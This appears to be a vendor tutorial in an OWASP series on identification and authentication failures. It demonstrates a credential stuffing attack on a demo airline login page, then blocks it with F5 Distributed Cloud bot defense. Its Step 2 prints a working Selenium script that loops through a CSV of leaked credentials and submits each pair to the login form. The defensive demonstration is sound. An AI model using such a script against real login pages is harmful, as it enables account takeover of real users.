Mitigating OWASP Web Application Risk: Identification and Authentication Failures using F5 XC
Introduction to OWASP:
- Introduction article covered details of OWASP
- 2nd article covered broken access attacks
- This 3rd article is in continuation of the series which will cover Identification and Authentication Failures.
Introduction to Identification and Authentication Failures:
In our daily activities confirmation of the user's identity, authentication, authorization and session management is critical to protect against authentication-related attacks. There may be authentication weaknesses if the application:
- Permits automated attacks such as credential stuffing, where the attacker has a list of valid usernames and passwords.
- Permits brute force or other automated attacks.
- Permits default, weak, or well-known passwords, such as "password", “default” or "admin".
- Uses plain text, encrypted, or weakly hashed passwords data store.
Introduction to credential stuffing:
This is the common attack attackers typically use with lists of known passwords with automation tools like Selenium, Postman, etc. and get authenticated. Suppose an application does not implement automated threat or credential stuffing protection, attacker can exploit the login page using this credential stuffing attack.
Step by step process:
Step1:
Please follow steps as per link to configure HTTP load balancer. Do not configure any security policies or bot-defense on this load balancer.
Step2:
Develop a selenium script to automate UI login page which uses credentials from creds.csv file as below:
from selenium import webdriver
import random
import string
import os
import csv
import sys
import argparse
import time
driver = webdriver.Chrome("chromedriver.exe")
parser = argparse.ArgumentParser()
parser.add_argument("--backend", help="Use the unprotected backend airline app", action="store_true")
args = parser.parse_args()
if args.backend:
target = 'https://jbair.f5-hyd-demo.com/user/signin'
else:
target = 'https://jbair.f5-hyd-demo.com/user/signin'
def loginuser(name, password):
driver.get(target)
driver.find_element_by_xpath('/html/body/div[2]/div/form/div[1]/input').send_keys(name)
driver.find_element_by_xpath('/html/body/div[2]/div/form/div[2]/input').send_keys(password)
driver.find_element_by_xpath('/html/body/div[2]/div/form/button').click()
f = open('creds.csv')
csv = csv.reader(f)
for row in csv:
print (row[0])
print (row[1])
if loginuser(row[0], row[1]) is True:
break
time.sleep(1)
driver.close()Step3:
Execute the above script to generate credential stuffing attack and to identify if anyone of the provided credentials is working.
In above steps we have seen how hackers were able to find valid credentials from large combinations of leaked passwords using simple automation scripts.
Prevention:
Below are some of the best practices suggested to prevent this credential stuffing attack:
- Multi Factor Authentication
- Secondary passwords
- Captcha solving
- Rate limiting requests
- Auditing failed logins
Mitigation using F5 distributed cloud:
- Please follow steps as per link to configure bot defense on load balancer.
- Make sure configurations are correct and mitigation action is set to Block as below:
- Rerun the above script again and validate your request is blocked as below.
- In Security monitoring Section, Navigate to Bot defense section to check the overview of bot defense. As shown below dashboard shows selenium bot type detected as threat intelligence. It also gave details about endpoints, Humans & Bot request counts and IP where bot requests were generated.
- Navigate to Requests and Bot traffic overview tabs to understand the reason why requests were blocked as below:
Conclusion:
As shown above, brute force attacks can be mitigated by configuring Bot-Defense on load balancer thereby preventing forceful browsing and credential stuffing.
For further information click the links below: